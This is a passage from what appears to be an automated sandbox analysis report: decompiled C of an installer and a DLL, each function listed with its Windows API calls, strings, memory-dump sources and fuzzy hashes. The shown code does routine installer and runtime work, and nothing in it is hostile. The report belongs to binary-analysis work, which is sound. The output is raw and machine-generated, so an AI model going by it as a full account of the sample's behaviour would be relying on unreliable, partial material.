                                      				void* _t26;
                                      				void* _t34;
                                      				signed int _t36;
                                      				signed int _t39;
                                      				unsigned int _t46;
                                      
                                      				_t46 = _a12;
                                      				_push(0x14);
                                      				_pop(0);
                                      				_t34 = 0xffffffdc;
                                      				if(_t46 < 0x100000) {
                                      					_push(0xa);
                                      					_pop(0);
                                      					_t34 = 0xffffffdd;
                                      				}
                                      				if(_t46 < 0x400) {
                                      					_t34 = 0xffffffde;
                                      				}
                                      				if(_t46 < 0xffff3333) {
                                      					_t39 = 0x14;
                                      					asm("cdq");
                                      					_t46 = _t46 + 1 / _t39;
                                      				}
                                      				_push(E0040594D(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                      				_push(E0040594D(_t34, 0, _t46,  &_v68, _t34));
                                      				_t21 = _t46 & 0x00ffffff;
                                      				_t36 = 0xa;
                                      				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                      				_push(_t46 >> 0);
                                      				_t26 = E0040594D(_t34, 0, 0x429fd8, 0x429fd8, _a8);
                                      				wsprintfA(_t26 + lstrlenA(0x429fd8), "%u.%u%s%s");
                                      				return SetDlgItemTextA( *0x42e338, _a4, 0x429fd8);
                                      			}














                                      APIs
                                      • lstrlenA.KERNEL32(00429FD8,00429FD8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004043D6,000000DF,0000040F,00000400,00000000), ref: 00404544
                                      • wsprintfA.USER32 ref: 0040454C
                                      • SetDlgItemTextA.USER32 ref: 0040455F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s
                                      • API String ID: 3540041739-3551169577
                                      • Opcode ID: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                      • Instruction ID: e44b7de75f1afc080fd53ae6a7962c6c3308310fc923ee70d3b0388825d49f6b
                                      • Opcode Fuzzy Hash: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                      • Instruction Fuzzy Hash: CE11E2B3A0022467DB10A66A9C05EAF36599BC2334F14023BFA29F61D1E9388C1186A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 51%
                                      			E00401BAD() {
                                      				signed int _t28;
                                      				CHAR* _t31;
                                      				long _t32;
                                      				int _t37;
                                      				signed int _t38;
                                      				int _t42;
                                      				int _t48;
                                      				struct HWND__* _t52;
                                      				void* _t55;
                                      
                                      				 *(_t55 - 0x34) = E004029CB(3);
                                      				 *(_t55 + 8) = E004029CB(4);
                                      				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                                      					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                                      				}
                                      				__eflags =  *(_t55 - 0x10) & 0x00000002;
                                      				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                                      					 *(_t55 + 8) = E004029E8(0x44);
                                      				}
                                      				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                                      				_push(1);
                                      				if(__eflags != 0) {
                                      					_t50 = E004029E8();
                                      					_t28 = E004029E8();
                                      					asm("sbb ecx, ecx");
                                      					asm("sbb eax, eax");
                                      					_t31 =  ~( *_t27) & _t50;
                                      					__eflags = _t31;
                                      					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                      					goto L10;
                                      				} else {
                                      					_t52 = E004029CB();
                                      					_t37 = E004029CB();
                                      					_t48 =  *(_t55 - 0x10) >> 2;
                                      					if(__eflags == 0) {
                                      						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                                      						L10:
                                      						 *(_t55 - 8) = _t32;
                                      					} else {
                                      						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                                      						asm("sbb eax, eax");
                                      						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                      					}
                                      				}
                                      				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                                      				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                                      					_push( *(_t55 - 8));
                                      					E00405889();
                                      				}
                                      				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t55 - 4));
                                      				return 0;
                                      			}













                                      APIs
                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: MessageSend$Timeout
                                      • String ID: !
                                      • API String ID: 1777923405-2657877971
                                      • Opcode ID: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                      • Instruction ID: 5ea9a142a0052d8e356a619bc15d353e54371354b2f8ef601c25db15878fdf82
                                      • Opcode Fuzzy Hash: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                      • Instruction Fuzzy Hash: 0A2183B1A44104AEEF01AFB5CD5BAAD7A75EF41704F14047AF501B61D1D6B88940D728
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 58%
                                      			E1000C230() {
                                      				intOrPtr _v8;
                                      				struct _WNDCLASSW _v48;
                                      
                                      				0x10000000("semi stub\n");
                                      				_v48.cbClsExtra = 0;
                                      				_v48.cbWndExtra = 4;
                                      				_v48.hInstance = 0;
                                      				_v48.hIcon = 0;
                                      				_v48.hCursor = 0;
                                      				_v48.hbrBackground = 6;
                                      				_v48.lpszMenuName = 0;
                                      				if( *0x10023874 == 0) {
                                      					_v48.style = 0x4088;
                                      					_v48.lpfnWndProc = E1000C1E0;
                                      					_v48.lpszClassName = L"REListBox20W";
                                      					if((RegisterClassW( &_v48) & 0x0000ffff) != 0) {
                                      						 *0x10023874 = 1;
                                      					}
                                      				}
                                      				if( *0x10023878 == 0) {
                                      					_v48.style = 0x408b;
                                      					_v48.lpfnWndProc = E1000C190;
                                      					_v48.lpszClassName = L"REComboBox20W";
                                      					if((RegisterClassW( &_v48) & 0x0000ffff) != 0) {
                                      						 *0x10023878 = 1;
                                      					}
                                      				}
                                      				_v8 = 0;
                                      				if( *0x10023874 != 0) {
                                      					_v8 = _v8 + 1;
                                      				}
                                      				if( *0x10023878 != 0) {
                                      					_v8 = _v8 + 2;
                                      				}
                                      				return _v8;
                                      			}






                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: ClassRegister
                                      • String ID: REListBox20W$semi stub
                                      • API String ID: 2764894006-902630105
                                      • Opcode ID: 48d770b24fbf94afe58b72655f91c47749ccb76f810f66546f5d07188698f6f8
                                      • Instruction ID: ab61b2e85b1783ad8925f31245d8954ca0ab6f8b2db5bb2e3fd5f2d8cd9e2fd3
                                      • Opcode Fuzzy Hash: 48d770b24fbf94afe58b72655f91c47749ccb76f810f66546f5d07188698f6f8
                                      • Instruction Fuzzy Hash: 8921C3B4C0135CDBEB00CFE5C9887EEBBF5EB04349F608158D5416B284D7BA9A89CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040518B(CHAR* _a4) {
                                      				struct _PROCESS_INFORMATION _v20;
                                      				int _t7;
                                      
                                      				0x42bfe0->cb = 0x44;
                                      				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42bfe0,  &_v20);
                                      				if(_t7 != 0) {
                                      					CloseHandle(_v20.hThread);
                                      					return _v20.hProcess;
                                      				}
                                      				return _t7;
                                      			}






                                      APIs
                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE0,Error launching installer), ref: 004051B0
                                      • CloseHandle.KERNEL32(?), ref: 004051BD
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040518B
                                      • Error launching installer, xrefs: 0040519E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                      • API String ID: 3712363035-2984075973
                                      • Opcode ID: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                      • Instruction ID: 2907f660324095bb22c49bf820cefbd87778b5f2e5ee3a47b55f65b03477d649
                                      • Opcode Fuzzy Hash: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                      • Instruction Fuzzy Hash: D6E0ECB4A14209ABEB10DF74ED0AE6F7BBCFB00344B408522AD11E2250D779E410CAB9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040541E(CHAR* _a4) {
                                      				CHAR* _t7;
                                      
                                      				_t7 = _a4;
                                      				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                      					lstrcatA(_t7, 0x40900c);
                                      				}
                                      				return _t7;
                                      			}





                                      APIs
                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405424
                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 0040542D
                                      • lstrcatA.KERNEL32(?,0040900C), ref: 0040543E
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040541E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CharPrevlstrcatlstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 2659869361-3916508600
                                      • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                      • Instruction ID: 104188ff39e6d10e0057bf8a610b6096ce4ad2879363e85d627e75dd9bc73d26
                                      • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                      • Instruction Fuzzy Hash: 04D0A9A2609A70BEE20227159C05ECB2E08CF02729B048422F140B22D2C33C4E82CFFE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • MessageBeep.USER32(00000010), ref: 1000AC39
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: BeepMessage
                                      • String ID:
                                      • API String ID: 2359647504-0
                                      • Opcode ID: 6910ef47118801366e84d6d677877baab536c4454372d37540177b44e2fc0040
                                      • Instruction ID: 51122b22d82e93d7578eb9d3e12bec3d74abf3b8d05eaa372307819e9751bcd1
                                      • Opcode Fuzzy Hash: 6910ef47118801366e84d6d677877baab536c4454372d37540177b44e2fc0040
                                      • Instruction Fuzzy Hash: 5CA151B9E00108AFEB04CF94D881FAE77B5EF49385F158168F9059B359D735EA80CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E1000AF50(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				long _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				intOrPtr _v28;
                                      				void _v32;
                                      				intOrPtr _t36;
                                      				intOrPtr _t41;
                                      				int _t43;
                                      				int _t46;
                                      				int _t51;
                                      				intOrPtr _t54;
                                      				signed int _t69;
                                      
                                      				if(_a8 < 0x200 || _a8 > 0x20e) {
                                      					return 0;
                                      				} else {
                                      					__eflags = _a8 - 0x203;
                                      					if(_a8 == 0x203) {
                                      						L7:
                                      						_t36 = _a8 - 2;
                                      						__eflags = _t36;
                                      						_a8 = _t36;
                                      						L8:
                                      						__eflags = _a8 - 0x201;
                                      						if(_a8 == 0x201) {
                                      							L12:
                                      							_v32 = _a4;
                                      							_v28 = _a8;
                                      							_v24 = _a12;
                                      							_v20 = _a16;
                                      							_v16 = GetMessageTime();
                                      							_v12 = _a16 & 0x0000ffff;
                                      							_v8 = _a16 >> 0x00000010 & 0x0000ffff;
                                      							__eflags =  *0x10023860;
                                      							if( *0x10023860 == 0) {
                                      								L20:
                                      								 *0x10023860 = 1;
                                      								L21:
                                      								memcpy(0x10023884,  &_v32, 7 << 2);
                                      								_t41 =  *0x10023860; // 0x0
                                      								return _t41;
                                      							}
                                      							__eflags = _v28 -  *0x10023888; // 0x0
                                      							if(__eflags != 0) {
                                      								goto L20;
                                      							}
                                      							__eflags = _v32 -  *0x10023884; // 0x0
                                      							if(__eflags != 0) {
                                      								goto L20;
                                      							}
                                      							_t69 = _v24;
                                      							__eflags = _t69 -  *0x1002388c; // 0x0
                                      							if(__eflags != 0) {
                                      								goto L20;
                                      							}
                                      							_t43 = GetDoubleClickTime();
                                      							__eflags = _v16 -  *0x10023894 - _t43;
                                      							if(_v16 -  *0x10023894 >= _t43) {
                                      								goto L20;
                                      							}
                                      							asm("cdq");
                                      							_t46 = GetSystemMetrics(0x24);
                                      							asm("cdq");
                                      							__eflags = (_v12 -  *0x10023898 ^ _t69) - _t69 - _t46 - _t69 >> 1;
                                      							if((_v12 -  *0x10023898 ^ _t69) - _t69 >= _t46 - _t69 >> 1) {
                                      								goto L20;
                                      							}
                                      							asm("cdq");
                                      							_t51 = GetSystemMetrics(0x25);
                                      							asm("cdq");
                                      							__eflags = (_v8 -  *0x1002389c ^ _t69) - _t69 - _t51 - _t69 >> 1;
                                      							if((_v8 -  *0x1002389c ^ _t69) - _t69 >= _t51 - _t69 >> 1) {
                                      								goto L20;
                                      							}
                                      							_t54 =  *0x10023860; // 0x0
                                      							 *0x10023860 = _t54 + 1;
                                      							goto L21;
                                      						}
                                      						__eflags = _a8 - 0x204;
                                      						if(_a8 == 0x204) {
                                      							goto L12;
                                      						}
                                      						__eflags = _a8 - 0x207;
                                      						if(_a8 == 0x207) {
                                      							goto L12;
                                      						}
                                      						__eflags = _a8 - 0x20b;
                                      						if(_a8 != 0x20b) {
                                      							return 0;
                                      						}
                                      						goto L12;
                                      					}
                                      					__eflags = _a8 - 0x206;
                                      					if(_a8 == 0x206) {
                                      						goto L7;
                                      					}
                                      					__eflags = _a8 - 0x209;
                                      					if(_a8 == 0x209) {
                                      						goto L7;
                                      					}
                                      					__eflags = _a8 - 0x20d;
                                      					if(_a8 != 0x20d) {
                                      						goto L8;
                                      					}
                                      					goto L7;
                                      				}
                                      			}


















                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: MetricsSystemTime$ClickDoubleMessage
                                      • String ID:
                                      • API String ID: 1405723157-0
                                      • Opcode ID: bf051335b62b91993131671aad62af69c0464c8771127e608fa3c8b888334c06
                                      • Instruction ID: 4743a1a950a993a0a7effd3ffa986fbfad1b616c5df29c54608cd1c298cb966e
                                      • Opcode Fuzzy Hash: bf051335b62b91993131671aad62af69c0464c8771127e608fa3c8b888334c06
                                      • Instruction Fuzzy Hash: 59418C71D0061ADFEB10DF69C8886AE77F1FB443A0F11C629E825AB299C7349D85CF41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E10016843(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                      				char _v8;
                                      				intOrPtr _v12;
                                      				int _v20;
                                      				int _t35;
                                      				int _t38;
                                      				intOrPtr* _t44;
                                      				int _t47;
                                      				short* _t49;
                                      				intOrPtr _t50;
                                      				intOrPtr _t54;
                                      				int _t55;
                                      				int _t59;
                                      				char* _t62;
                                      
                                      				_t62 = _a8;
                                      				if(_t62 == 0) {
                                      					L5:
                                      					return 0;
                                      				}
                                      				_t50 = _a12;
                                      				if(_t50 == 0) {
                                      					goto L5;
                                      				}
                                      				if( *_t62 != 0) {
                                      					E1000CE78( &_v20, _a16);
                                      					_t35 = _v20;
                                      					__eflags =  *(_t35 + 0xa8);
                                      					if( *(_t35 + 0xa8) != 0) {
                                      						_t38 = E10013A5C( *_t62 & 0x000000ff,  &_v20);
                                      						__eflags = _t38;
                                      						if(_t38 == 0) {
                                      							__eflags = _a4;
                                      							_t59 = 1;
                                      							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                      							if(__eflags != 0) {
                                      								L21:
                                      								__eflags = _v8;
                                      								if(_v8 != 0) {
                                      									_t54 = _v12;
                                      									_t31 = _t54 + 0x70;
                                      									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                      									__eflags =  *_t31;
                                      								}
                                      								return _t59;
                                      							}
                                      							L20:
                                      							_t44 = E10010E25(__eflags);
                                      							_t59 = _t59 | 0xffffffff;
                                      							__eflags = _t59;
                                      							 *_t44 = 0x2a;
                                      							goto L21;
                                      						}
                                      						_t59 = _v20;
                                      						__eflags =  *(_t59 + 0x74) - 1;
                                      						if( *(_t59 + 0x74) <= 1) {
                                      							L15:
                                      							__eflags = _t50 -  *(_t59 + 0x74);
                                      							L16:
                                      							if(__eflags < 0) {
                                      								goto L20;
                                      							}
                                      							__eflags = _t62[1];
                                      							if(__eflags == 0) {
                                      								goto L20;
                                      							}
                                      							L18:
                                      							_t59 =  *(_t59 + 0x74);
                                      							goto L21;
                                      						}
                                      						__eflags = _t50 -  *(_t59 + 0x74);
                                      						if(__eflags < 0) {
                                      							goto L16;
                                      						}
                                      						__eflags = _a4;
                                      						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                      						_t59 = _v20;
                                      						__eflags = _t47;
                                      						if(_t47 != 0) {
                                      							goto L18;
                                      						}
                                      						goto L15;
                                      					}
                                      					_t55 = _a4;
                                      					__eflags = _t55;
                                      					if(_t55 != 0) {
                                      						 *_t55 =  *_t62 & 0x000000ff;
                                      					}
                                      					_t59 = 1;
                                      					goto L21;
                                      				}
                                      				_t49 = _a4;
                                      				if(_t49 != 0) {
                                      					 *_t49 = 0;
                                      				}
                                      				goto L5;
                                      			}

















                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10016879
                                      • __isleadbyte_l.LIBCMT ref: 100168A7
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 100168D5
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 1001690B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 9d970cf35d58c14656f4e4d88a0c2ea8e95bdc9fb0819011eb18038aea34c680
                                      • Instruction ID: 7833a9f48923a533d51261301a36c179121128e15ef96b58cf55e27fd01ad769
                                      • Opcode Fuzzy Hash: 9d970cf35d58c14656f4e4d88a0c2ea8e95bdc9fb0819011eb18038aea34c680
                                      • Instruction Fuzzy Hash: 2F31A431A00256AFDB11CF75CC44B6A7BE9FF49394F128669E8549F1A0DB31E8D0DB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E00401EC5(char __ebx, char* __edi, char* __esi) {
                                      				char* _t18;
                                      				int _t19;
                                      				void* _t30;
                                      
                                      				_t18 = E004029E8(0xffffffee);
                                      				 *(_t30 - 0x2c) = _t18;
                                      				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                                      				 *__esi = __ebx;
                                      				 *(_t30 - 8) = _t19;
                                      				 *__edi = __ebx;
                                      				 *((intOrPtr*)(_t30 - 4)) = 1;
                                      				if(_t19 != __ebx) {
                                      					__eax = GlobalAlloc(0x40, __eax);
                                      					 *(__ebp + 8) = __eax;
                                      					if(__eax != __ebx) {
                                      						if(__eax != 0) {
                                      							__ebp - 0x44 = __ebp - 0x34;
                                      							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                                      								 *(__ebp - 0x34) = E00405889(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                                      								 *(__ebp - 0x34) = E00405889(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                                      								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                      							}
                                      						}
                                      						_push( *(__ebp + 8));
                                      						GlobalFree();
                                      					}
                                      				}
                                      				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
                                      				return 0;
                                      			}







                                      APIs
                                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                      • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                                        • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                      • String ID:
                                      • API String ID: 1404258612-0
                                      • Opcode ID: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                      • Instruction ID: 5df6cf6993c09150fb4e954c2a2c9de352bdee8941cce83e0996c7e852039ca5
                                      • Opcode Fuzzy Hash: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                      • Instruction Fuzzy Hash: 56111C72900108BEDB01EFA5DD45DAEBBB9EF04344B20807AF501F61E1D7789A54DB28
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E10012142(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                      				intOrPtr _t25;
                                      				void* _t26;
                                      				void* _t28;
                                      
                                      				_t25 = _a16;
                                      				if(_t25 == 0x65 || _t25 == 0x45) {
                                      					_t26 = E10012693(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                      					goto L9;
                                      				} else {
                                      					_t35 = _t25 - 0x66;
                                      					if(_t25 != 0x66) {
                                      						__eflags = _t25 - 0x61;
                                      						if(_t25 == 0x61) {
                                      							L7:
                                      							_t26 = E100121C8(_a4, _a8, _a12, _a20, _a24, _a28);
                                      						} else {
                                      							__eflags = _t25 - 0x41;
                                      							if(__eflags == 0) {
                                      								goto L7;
                                      							} else {
                                      								_t26 = E1001290E(_t28, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                      							}
                                      						}
                                      						L9:
                                      						return _t26;
                                      					} else {
                                      						return E1001284D(_t28, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                                      					}
                                      				}
                                      			}







                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction ID: b27eb37d8593793b6681418b863e132560dc71e99f8d71fa64f69b92b92cff94
                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction Fuzzy Hash: 120189B644018EBBCF029F84DC01CEE3F62FF28294B058415FE1859030C232DAF1AB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004054B2(char _a4) {
